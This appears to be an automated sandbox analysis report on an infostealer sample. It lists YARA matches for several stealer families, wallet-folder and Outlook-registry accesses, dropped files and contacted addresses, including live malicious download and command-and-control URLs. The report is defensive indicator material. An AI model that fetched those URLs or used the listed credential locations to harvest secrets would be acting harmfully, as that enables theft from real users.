Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 31.2.cmd.exe.5ac00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.cmd.exe.5ac00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.MSBuild.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2498896890.00000000006CB000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2522072387.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u48o.0.exe PID: 3912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\wyftaheq, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pfswlxy, type: DROPPED

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.5c90e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.5c90e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.u48o.0.exe.5cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25659b50000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25659b50000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1530072053.00000256544FB000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 31.2.cmd.exe.5ac00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.cmd.exe.5ac00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1714070421.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2051122015.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\wyftaheq, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pfswlxy, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u48o.0.exe PID: 3912, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.5c90e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.u48o.0.exe.5c90e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.u48o.0.exe.5cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u48o.0.exe PID: 3912, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3E0C40 sqlite3_bind_zeroblob,	10_2_6C3E0C40
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3E0D60 sqlite3_bind_parameter_name,	10_2_6C3E0D60
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C308EA0 sqlite3_clear_bindings,	10_2_6C308EA0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C3E0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	10_2_6C3E0B40
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_6C306410 bind,WSAGetLastError,	10_2_6C306410

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	341 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Windows Service	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	22 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	3 Obfuscated Files or Information	NTDS	288 System Information Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Software Packing	LSA Secrets	551 Security Software Discovery	SSH	11 Input Capture	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	351 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
zLwT7vCojz.exe	39%	ReversingLabs	Win32.Packed.Generic
zLwT7vCojz.exe	40%	Virustotal		Browse
zLwT7vCojz.exe	100%	Avira	HEUR/AGEN.1313018
zLwT7vCojz.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\pfswlxy	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\pfswlxy	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal		Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	3%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll	13%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\pfswlxy	59%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\pfswlxy	60%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u48o.0.exe	37%	ReversingLabs	Win32.Packed.Generic
C:\Users\user\AppData\Local\Temp\u48o.0.exe	42%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u48o.1.exe	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u48o.1.exe	3%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\wyftaheq	59%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\wyftaheq	60%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
note.padd.cn.com	1%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
download.iolo.net	0%	Virustotal	Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	0%, Virustotal, Browse	unknown
iolo0.b-cdn.net	169.150.236.99	true	false		high
note.padd.cn.com	176.97.76.106	true	false	1%, Virustotal, Browse	unknown
svc.iolo.com	20.157.87.45	true	false		high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown
time.windows.com	unknown	unknown	false		high
download.iolo.net	unknown	unknown	true	0%, Virustotal, Browse	unknown
westus2-2.in.applicationinsights.azure.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.172.128.228/BroomSetup.exe	false
185.172.128.76/3cd2b41cbde8fc9c.php	true
http://185.172.128.76/3cd2b41cbde8fc9c.php	true
http://185.172.128.76/15f649199f40275b/sqlite3.dll	true
http://185.172.128.76/15f649199f40275b/softokn3.dll	true
http://185.172.128.59/syncUpd.exe	false
http://note.padd.cn.com/1/Qg_Appv5.exe	false
http://185.172.128.76/15f649199f40275b/nss3.dll	true
http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0	true
http://185.172.128.76/15f649199f40275b/mozglue.dll	true
http://185.172.128.76/15f649199f40275b/msvcp140.dll	true

URLs from Memory and Binaries

Name	Source	Malicious
https://duckduckgo.com/chrome_newtab	u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	false
https://monitor.azure.com//.default	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://www.vmware.com/0	Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	false
https://snapshot.monitor.azure.com/&	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.	u48o.1.exe, 0000000E.00000003.1718956588.00000000025C4000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002526000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002589000.00000004.00001000.00020000.00000000.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.phphm	u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	false
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
https://www.iolo.com/company/legal/sales-policy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	false
http://www.indyproject.org/	zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002582000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	false
https://support.iolo.com/support/solutions/articles/44001781185?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
https://www.iolo.com/company/legal/privacy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://www.codeplex.com/CompositeWPF	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
https://support.iolo.com/support/solutions/articles/44001781185	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.000002565A0D0000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	false
https://scripts.sil.org/OFL	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmp	false
https://taskscheduler.codeplex.com/H	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.php/m	u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	false
https://www.iolo.com/company/legal/sales-policy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
https://scripts.sil.org/OFLX8	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmp	false
https://westus2-2.in.applicationinsights.azure.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	false
http://185.172.128.76/3cd2b41cbde8fc9c.php3m1	u48o.0.exe, 0000000A.00000002.1708508676.000000002A801000.00000004.00000020.00020000.00000000.sdmp	false
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	false
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.46	u48o.1.exe, 0000000E.00000003.1718956588.0000000002544000.00000004.00001000.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	false
https://indiantypefoundry.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmp	false
https://download.avira.com/download/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	false
http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2521152454.0000025659B80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://dejavu.sourceforge.net	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp	false
http://www.mozilla.com/en-US/blocklist/	u48o.0.exe, u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmp	false
http://185.172.128.76/15f649199f40275b/freebl3.dllU	u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	false
https://www.iolo.com/company/legal/privacy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	false
http://185.172.128.76/15f649199f40275b/mozglue.dllc	u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	false
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	false
https://rt.services.visualstudio.com/l	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	false
http://185.172.128.76/15f649199f40275b/freebl3.dllG	u48o.0.exe, 0000000A.00000002.1688142273.00000000040BA000.00000004.00000020.00020000.00000000.sdmp	false
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection	Qg_Appv5.exe, 0000000D.00000002.1455543827.000000000701F000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, UniversalInstaller.exe, 00000012.00000002.1385724944.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000000.1373724889.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000014.00000000.1384104733.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000014.00000002.1472732421.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp	false
https://dc.services.visualstudio.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0&	zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	false
